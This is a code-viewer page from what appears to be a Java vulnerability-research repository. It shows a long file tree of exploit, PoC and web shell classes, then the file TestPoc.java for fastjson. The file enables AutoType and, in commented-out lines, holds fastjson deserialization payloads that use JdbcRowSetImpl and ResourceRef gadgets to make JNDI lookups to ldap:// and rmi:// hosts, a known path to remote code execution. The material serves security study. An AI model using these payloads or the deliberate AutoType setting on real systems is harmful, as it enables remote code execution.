java source code of TestPoc

learnjavabug-master
- fastjson
  - src
    - main
      - java
        com
        threedr3am
        bug
        fastjson
        dos
        ReDOSPoc.java
        test
        A.java
        Test.java
        Bypass.java
        TestPoc.java
        leak
        seleniumBypassAutotype1_2_68.java
        rce
        QuercusPoc.java
        FastjsonSerialize.java
        ShiroPoc.java
        Cmd.java
        AriesJMSPoc.java
        IbatisSqlmapPoc.java
        CocoonSlidePoc.java
        AnterosPoc.java
        HadoopHikariPoc.java
        ShiroPoc2.java
        CommonsProxyPoc.java
        NoNeedAutoTypePoc.java
        HikariConfigPoc.java
        JndiConverterPoc.java
        AriesJMSPoc2.java
        IgniteJtaPoc.java
        package-info.java
        dns
        Inet6AddressPoc.java
        InetSocketAddressPoc.java
        Inet4AddressPoc.java
        URLPoc.java
        ssrf
        ApacheCxfSSRFPoc.java
        CommonsJellySSRFPoc.java
        JREJeditorPaneSSRFPoc.java
        ApacheCxfSSRFPoc2.java
  - pom.xml
- nexus
  - CVE-2020-10204
    - README.md
  - pom.xml
  - CVE-2020-11444
    - README.md
  - CVE-2020-10199
    - README.md
- spring
  - spring-cloud-config-server-CVE-2020-5405
    - src
      - main
        resources
        application.yml
        java
        com
        threedr3am
        bug
        spring
        config
        server
        package-info.java
        Application.java
    - pom.xml
  - pom.xml
  - spring-cloud-config-server(CVE-2019-3799)
    - src
      - main
        resources
        application.yml
        java
        com
        threedr3am
        bug
        spring
        config
        server
        package-info.java
        Application.java
    - pom.xml
  - spring-cloud-config-server-CVE-2020-5410
    - src
      - main
        resources
        application.yml
        java
        com
        threedr3am
        bug
        spring
        config
        server
        package-info.java
        Application.java
    - pom.xml
  - spring-boot-actuator-bug
    - src
      - main
        java
        com
        threedr3am
        bug
        spring
        actuator
        snakeyaml
        A.java
        SnakeYamlTest.java
    - actuator-1.4
      - src
        main
        resources
        logback-evil.xml
        logback.xml
        snake-yaml-evil.yml
        xstream-evil.xml
        java
        com
        threedr3am
        bug
        spring
        actuator
        JolokiaAttackForLogback.java
        EurekaAttackForXStream.java
        AttackSnakeYaml.java
        Application.java
      - pom.xml
    - actuator-1.5
      - src
        main
        resources
        application.yml
        logback-evil.xml
        logback.xml
        snake-yaml-evil.yml
        java
        com
        threedr3am
        bug
        spring
        actuator
        JolokiaAttackForLogback.java
        AttackSnakeYaml.java
        package-info.java
        Application.java
      - pom.xml
    - pom.xml
    - actuator-2.0
      - src
        main
        resources
        application.yml
        logback.xml
        java
        com
        threedr3am
        bug
        spring
        actuator
        JolokiaAttackForLogback.java
        AttackSnakeYaml.java
        package-info.java
        AttackHikariCP.java
        Application.java
      - pom.xml
    - actuator-1.2
      - src
        main
        resources
        logback-evil.xml
        logback.xml
        snake-yaml-evil.yml
        java
        com
        threedr3am
        bug
        spring
        actuator
        JolokiaAttackForLogback.java
        AttackSnakeYaml.java
        Application.java
      - pom.xml
    - actuator-1.3
      - src
        main
        resources
        logback-evil.xml
        logback.xml
        snake-yaml-evil.yml
        java
        com
        threedr3am
        bug
        spring
        actuator
        JolokiaAttackForLogback.java
        AttackSnakeYaml.java
        Application.java
      - pom.xml
    - README.md
  - spring-session-redis-sync
    - 2
      - src
        main
        resources
        application.yml
        java
        me
        threedr3am
        bug
        spring
        redis
        session
        config
        SpringHttpSessionConfig.java
        Application.java
        controller
        TestController.java
      - pom.xml
    - src
      - main
        java
        me
        threedr3am
        bug
        spring
        redis
        session
        utils
        Reflections.java
        Gadgets.java
        support
        ClassFiles.java
        CommonCollections4.java
        Main.java
    - pom.xml
    - 1
      - src
        main
        resources
        application.yml
        java
        me
        threedr3am
        bug
        spring
        redis
        session
        config
        SpringHttpSessionConfig.java
        Application.java
        controller
        TestController.java
      - pom.xml
    - README.md
- dubbo
  - src
    - main
      - java
        com
        threedr3am
        bug
        dubbo
        RomePoc.java
        utils
        JDKUtil.java
        Gadgets.java
        ToStringUtil.java
        UtilFactory.java
        TemplatesUtil.java
        SpringUtil.java
        ResinPoc.java
        support
        NoWriteReplaceSerializerFactory.java
        SpringAbstractBeanFactoryPointcutAdvisorPoc.java
        XBeanPoc.java
  - pom.xml
  - dubbo-hessian2-safe-reinforcement
    - module-info
    - pom.xml
    - learn-dubbo-client-boot
      - src
        main
        resources
        META-INF
        dubbo
        org.apache.dubbo.common.serialize.Serialization
        application.properties
        java
        com
        threedr3am
        learn
        client
        boot
        Test.java
        LearnDubboClientBootApplication.java
        serialize
        MyHessian2Input.java
        MyHessian2Serialization.java
        MyHessian2ObjectInput.java
        test
        java
        com
        threedr3am
        learn
        client
        boot
        LearnDubboClientBootApplicationTests.java
      - pom.xml
    - learn-dubbo-server-boot
      - src
        main
        resources
        META-INF
        dubbo
        org.apache.dubbo.common.serialize.Serialization
        application.properties
        java
        com
        threedr3am
        learn
        server
        boot
        B.java
        A.java
        DemoServiceImpl.java
        LearnDubboServerBootApplication.java
        DemoService.java
        serialize
        MyHessian2Input.java
        MyHessian2Serialization.java
        MyHessian2ObjectInput.java
        test
        java
        com
        threedr3am
        learn
        server
        boot
        LearnDubboServerBootApplicationTests.java
      - pom.xml
- pom.xml
- jackson
  - src
    - main
      - resources
        inject.sql
      - java
        com
        threedr3am
        bug
        jackson
        MysqlFileRead.java
        test
        DefaultTypeTest.java
        A.java
        JsonTypeInfoTest.java
        PocTest.java
        rce
        QuercusPoc.java
        ShiroPoc.java
        SpringAopPoc.java
        AriesJMSPoc.java
        H2Rce.java
        IbatisSqlmapPoc.java
        AnterosPoc.java
        IgniteJtaPoc2.java
        ShiroPoc2.java
        HikariConfigPoc.java
        SpringAopPoc2.java
        JndiConverterPoc.java
        AriesJMSPoc2.java
        QuartzPoc.java
        EhcacheJndi.java
        IgniteJtaPoc.java
        LogbackJndi.java
        HadoopHikariConfigPoc.java
        package-info.java
        ssrf
        JREJeditorPaneSSRFPoc.java
  - pom.xml
- tomcat
  - sync-session-bug
    - src
      - main
        java
        com
        threedr3am
        bug
        tomcat
        sync
        session
        utils
        ClassFiles.java
        Serializer.java
        Reflections.java
        Converter.java
        Gadgets.java
        TomcatSessionClusterExploit.java
        support
        SessionMessageImpl.java
        UUIDGenerator.java
        MemberImpl.java
        ClusterMessageBase.java
        ClusterMessage.java
        ChannelData.java
        ChannelMessage.java
        XByteBuffer.java
        SessionMessage.java
        Member.java
        payload
        Jdk8u20.java
        URLDNS.java
        Payloads.java
        Jdk7u21.java
        Payload.java
    - pom.xml
    - README.md
  - pom.xml
  - session-filestore
    - pom.xml
    - README.md
  - ajp-bug
    - src
      - main
        java
        com
        threedr3am
        bug
        tomcat
        ajp
        support
        TesterAjpMessage.java
        SimpleAjpClient.java
        FileRead.java
    - pom.xml
    - README.md
- cas
  - src
    - main
      - java
        com
        threedr3am
        bug
        cas
        package-info.java
  - cas默认账号密码.txt
  - 4.1.7-4.2.x
    - src
      - main
        resources
        log4j2.xml
        java
        com
        threedr3am
        bug
        cas
        AttackDemo.java
        package-info.java
        webapp
        WEB-INF
        cas.properties
        web.xml
    - pom.xml
  - 4.1.x-4.1.6
    - src
      - main
        resources
        log4j2.xml
        etc
        keystore.jceks
        java
        com
        threedr3am
        bug
        cas
        AttackDemo.java
        package-info.java
        webapp
        WEB-INF
        cas.properties
        web.xml
    - pom.xml
  - pom.xml
  - 5.x
    - src
      - main
        resources
        log4j2.xml
        META-INF
        spring.factories
        application.properties
        java
        com
        threedr3am
        bug
        cas
        package-info.java
        webapp
        WEB-INF
        web.xml
    - pom.xml
- apache-poi
  - pom.xml
  - cve-2014-3529
    - src
      - main
        resources
        test.xlsx
        xxe.dtd
        java
        com
        threedr3am
        bug
        poi
        CVE_2014_3529.java
    - pom.xml
- LICENSE
- common
  - src
    - main
      - resources
        META-INF
        services
        javax.script.ScriptEngineFactory
      - java
        TomcatEchoInject.java
        CalcScriptEngineFactory.java
        WebShell.java
        com
        threedr3am
        bug
        common
        utils
        SerializeUtil.java
        FileToByteArrayUtil.java
        Reflections.java
        package-info.java
        HttpUtil.java
        TemplatesUtil.java
        support
        ClassFiles.java
        package-info.java
        server
        package-info.java
        RmiServer.java
        LdapServer.java
        HTTPServer.java
        FtpServer.java
        org
        apache
        catalina
        startup
        Catalina.java
        Calc.java
        TomcatShellInject.java
  - pom.xml
- xxe
  - src
    - main
      - java
        com
        threedr3am
        bug
        xxe
        SAXReader_DOM4JTest.java
        Features.java
        Payloads.java
        SAXTransformerFactoryTest.java
        TransformerFactoryTest.java
        package-info.java
        DocumentBuilderFactory_DOMTest.java
        SchemaFactoryTest.java
        SAXBuilder_JDOMTest.java
        SAXParserFactory_SAXTest.java
        UnmarshallerTest.java
        XMLReaderTest.java
        ValidatorSampleTest.java
  - pom.xml
- security-manager
  - src
    - main
      - java
        com
        threedr3am
        bug
        security
        manager
        Evil.java
        package-info.java
        CodeBaseTest.java
        AttackTest.java
  - pom.xml
- common-collections
  - src
    - main
      - java
        com
        threedr3am
        bug
        collections
        v3
        no2
        SerializeMapForTransformer.java
        CallbackRuntime2.java
        CallbackRuntime.java
        package-info.java
        no1
        SerializeMapForTransformer.java
        package-info.java
  - pom.xml
- shiro
  - auth-bypass(shiro<1.5.2)
    - src
      - main
        resources
        application.yml
        java
        com
        threedr3am
        bug
        shiro
        bypass
        auth
        config
        ShiroConfig.java
        realm
        MyRealm.java
        Application.java
        controller
        BypassTestController.java
        LoginController.java
    - pom.xml
  - pom.xml
  - auth-bypass(shiro<=1.4.1)
    - src
      - main
        java
        com
        threedr3am
        bug
        shiro
        bypass
        auth
        config
        ShiroConfig.java
        realm
        MyRealm.java
        Application.java
        controller
        BypassTestController.java
        LoginController.java
    - pom.xml
- ShardingSphere-UI
  - pom.xml
  - CVE-2020-1947
    - src
      - main
        java
        com
        threedr3am
        bug
        shardingsphere
        ui
        Poc.java
    - pom.xml
    - README.md
- README.md
- feature
  - src
    - main
      - java
        com
        threedr3am
        bug
        feature
        HessianSerialization.java
        CAS4$1And4$2.java
        KryoSerialization.java
        JavaClassByteCode.java
        FastjsonSerialization.java
        XStream.java
        JYAML.java
        package-info.java
        JavaSerialization.java
        JacksonSerialization.java
        SnakeYAML.java
        JolokiaAttackUrlFeature.java
  - pom.xml
- .gitignore
- rmi
  - src
    - main
      - java
        com
        threedr3am
        bug
        rmi
        utils
        Reflections.java
        Gadgets.java
        registry
        AttackRMIRegistry.java
        RMIRegistry.java
        client
        JndiLookupForJdk8u121To191.java
        RMIClient.java
        JndiLookupForLeJdk8u121.java
        JndiLookupForGtJdk8u191.java
        support
        ClassFiles.java
        CommonCollections4.java
        server
        RMIServer.java
        service
        HelloServiceImpl.java
        HelloService.java
  - pom.xml
- padding-oracle-cbc
  - src
    - main
      - java
        com
        threedr3am
        bug
        paddingoraclecbc
        PaddingOracleCBCForShiro.java
        PaddingOracleCBC2.java
        PaddingOracle.java
        package-info.java
        PaddingOracleCBC.java
  - pom.xml
- java-compile
  - src
    - main
      - java
        com
        threedr3am
        bug
        compile
        package-info.java
        javac
        ByJavaCompiler.java
        CustomJavaFileObject.java
        ByJavaFileObject.java
        RuntimeMakeClass.java
        CustomJavaFileObjectAndFileManeger.java
        javassist
        Javassist.java
  - pom.xml

package com.threedr3am.bug.fastjson.test;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;
import com.threedr3am.bug.common.server.LdapServer;

/**
 * 挖洞
 *
 * @author threedr3am
 */
public class TestPoc {

    static {
        //rmi server示例
//    RmiServer.run();

        //ldap server示例
//        LdapServer.run();
    }

    public static void main(String[] args) {
//    MockHttpServletRequest mockReq = new MockHttpServletRequest();
//    DefaultSavedRequest request = new DefaultSavedRequest(mockReq, new PortResolver() {
//
//      public int getServerPort(ServletRequest servletRequest) {
//        return 0;
//      }
//    });
//
//    String str = JSON.toJSONString(request, SerializerFeature.WriteClassName);
//    System.out.println(str);

//      String str = "{\"rand1\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"rand2\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:43658\",\"autoCommit\":true}";
//      String str = "{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://localhost:43658\",\"autoCommit\":true}}";
//    String str = "{\"@type\":\"org.springframework.security.web.savedrequest.DefaultSavedRequest\",\"contextPath\": {\"@type\":\"com.caucho.config.types.ResourceRef\",\"lookupName\": \"ldap://localhost:43658/Calc\"}}";
        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
//        String str = "{\"a\": {\"$ref\":\"$.class\"}}";
//        AAA aaa = JSON.parseObject(str, AAA.class);
//        ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
//        String str = "{\"a\": {\"$ref\": \"$.a\"}, \"b\": {\"$ref\": \"$.b\"}, \"c\": {\"$ref\": \"$.c\"}, \"d\": {\"$ref\": \"$.d\"}}";
//        JSON.parseObject(str, AAA.class);
//        AAA aaa = new AAA();
//        System.out.println(aaa.getA());
        String json = "{\"\"}";
        JSON.parse(json);
//    JSON.parseObject(str);
    }
}

class AAA {

    private String a;

    public String getA() {
        System.out.println("call the getA method!...");
        return null;
    }

    public void setA(String a) {
        this.a = a;
    }

    public AAA getB() {
        System.out.println("call the getB method!...");
        return null;
    }

    public Object getC() {
        System.out.println("call the getC method!...");
        return null;
    }

    public String getD() {
        System.out.println("call the getD method!...");
        return null;
    }


}